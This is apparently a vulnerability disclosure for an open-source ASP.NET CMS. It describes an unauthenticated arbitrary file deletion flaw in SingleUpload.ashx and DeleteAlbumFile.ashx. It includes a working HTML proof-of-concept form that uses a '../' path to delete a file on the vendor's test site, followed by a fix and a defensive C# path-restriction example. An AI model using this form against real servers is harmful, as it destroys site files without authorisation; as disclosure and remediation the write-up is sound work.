Two pages in this open-source CMS have the problem.
Looking at the code:
File 1, SingleUpload.ashx
// Check whether the user is logged in before performing the upload
//if (!new ManagePage().IsAdminLogin())
//{
//    context.Response.Write("{msg: 0, msbox: \"Please log on and upload the file again!\"}");
//    return;
//}
The code that verifies the login has been commented out entirely. Reading on, this is how the name of the file to delete is obtained:
string _refilepath = context.Request.QueryString["ReFilePath"]; // get the name of the returned object
// The value of the request parameter named by ReFilePath is used as the path to delete
string _delfile = context.Request.Params[_refilepath];
UpLoad upFiles = new UpLoad();
string msg = upFiles.fileSaveAs(_upfile, _iswater);
// Delete an existing old file
if (!string.IsNullOrEmpty(_delfile))
{
    string _filename = Utils.GetMapPath(_delfile);
    if (File.Exists(_filename))
    {
        File.Delete(_filename);
    }
}
Basically, as long as the permissions allow it, anything can be deleted. There is one more piece of code in between that should be noted: the file to be uploaded cannot be empty:
if (_upfile == null)
{
    context.Response.Write("{\"msg\": 1, \"msbox\": \"select the file to upload!\"}");
    return;
}
Based on the above, the request can be constructed.
File 2, DeleteAlbumFile.ashx: the problem is similar to the one above.
Proof of vulnerability:
<form action="http://test.50cms.com/tools/SingleUpload.ashx?UpFilePath=FileUpload&ReFilePath=123" method="post" enctype="multipart/form-data">
Select a file: <input type="file" id="file" name="FileUpload"/><br>
Select path: <input type="input" name="123" value="../KindEditor/asp.net/demo.aspx"/><br>
<input type="submit"/><br>
</form>
Compare the following two figures:
Solution:
Don't let people delete arbitrary files... In addition, login must be required.
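One way to implement the path restriction from the solution, as an added example that is not the CMS's own code: once the login check is restored, the handler would only call File.Delete on a path that this check accepts. UploadPathGuard, TryResolve and the "upload" directory are hypothetical names, and a Windows/IIS host is assumed.

```csharp
using System;
using System.IO;

// Added example, not the CMS's code. UploadPathGuard and the "upload"
// directory are hypothetical names; a Windows/IIS host is assumed.
public static class UploadPathGuard
{
    // True only if clientPath, resolved against uploadRoot, stays inside it.
    public static bool TryResolve(string uploadRoot, string clientPath, out string fullPath)
    {
        fullPath = null;
        if (string.IsNullOrWhiteSpace(clientPath) || clientPath.IndexOf('\0') >= 0)
            return false;
        try
        {
            // Root with one trailing separator, so a sibling such as
            // "upload-old" cannot pass the prefix test for "upload".
            string root = Path.GetFullPath(uploadRoot)
                .TrimEnd(Path.DirectorySeparatorChar, Path.AltDirectorySeparatorChar)
                + Path.DirectorySeparatorChar;
            // GetFullPath collapses ".." segments; a rooted clientPath
            // replaces the root in Combine and then fails the check below.
            string candidate = Path.GetFullPath(Path.Combine(root, clientPath));
            // Case-insensitive to match Windows file systems (assumption).
            if (!candidate.StartsWith(root, StringComparison.OrdinalIgnoreCase))
                return false;
            fullPath = candidate;
            return true;
        }
        catch (ArgumentException) { return false; }      // illegal characters
        catch (NotSupportedException) { return false; }  // e.g. stray ':'
        catch (PathTooLongException) { return false; }
    }

    public static void Main()
    {
        // Constructed sample layout in a temporary directory.
        string site = Path.Combine(Path.GetTempPath(), "guard-demo");
        string upload = Path.Combine(site, "upload");
        Directory.CreateDirectory(upload);
        File.WriteAllText(Path.Combine(upload, "old.jpg"), "x");
        File.WriteAllText(Path.Combine(site, "demo.aspx"), "x");
        foreach (string p in new[] { "old.jpg", "../demo.aspx", "../upload-old/a.jpg" })
        {
            string full;
            bool ok = TryResolve(upload, p, out full);
            if (ok && File.Exists(full)) File.Delete(full);
            Console.WriteLine("{0,-22} {1}", p, ok ? "deleted if present" : "rejected");
        }
        Console.WriteLine("demo.aspx intact: " + File.Exists(Path.Combine(site, "demo.aspx")));
    }
}
```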